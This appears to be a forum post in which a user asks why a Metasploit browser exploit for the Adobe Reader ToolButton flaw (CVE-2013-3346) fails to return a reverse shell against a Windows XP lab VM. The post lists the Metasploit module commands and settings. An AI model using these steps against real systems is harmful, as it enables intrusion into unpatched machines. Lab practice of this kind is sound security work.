Error using metasploit "Adobe Reader ToolButton"


New Member
Sep 13, 2022
Reaction score
Hello everybody I'm trying to use metasploit for execute an exploit based on "Adobe Reader ToolButton" [1] CVE-2013-3346 [2].
I don't understand if I'm wronging in some settings, however I'll try to explain perfectly what I'm doing.
My OS: Ubuntu 22
VM OS: Windows XP SP3 from [3]
Adobe Reader version tried: 9.0 9.4 10 10.0.2 10.0.3 11
Metasploit commands:
use exploit/windows/browser/adobe_toolbutton
set TARGET 0
set LHOST <my_local_ip>
set SRVHOST <my_local_ip>
I tried too with just
use exploit/windows/browser/adobe_toolbutton
set TARGET 0

With Adobe Reder different of 10.0.2 and 10.0.3 when i load the metasploit link with IE it will load the blank PDF without establish a reverse shell in metasploit console.
When i tried with Adobe Reader with 10.0.2 or 10.0.3 version i have an IE error that say me:
'XMLHttpRequest' not defined
but I tried to find an "XML" option in IE advanced options -> security section.

I hope that i wrote everything and hope that somebody can help me. <3

MALIBAL Linux Laptops

Linux Laptops Custom Built for You
MALIBAL is an innovative computer manufacturer that produces high-performance, custom laptops for Linux.

For more info, visit:

Members online

Latest posts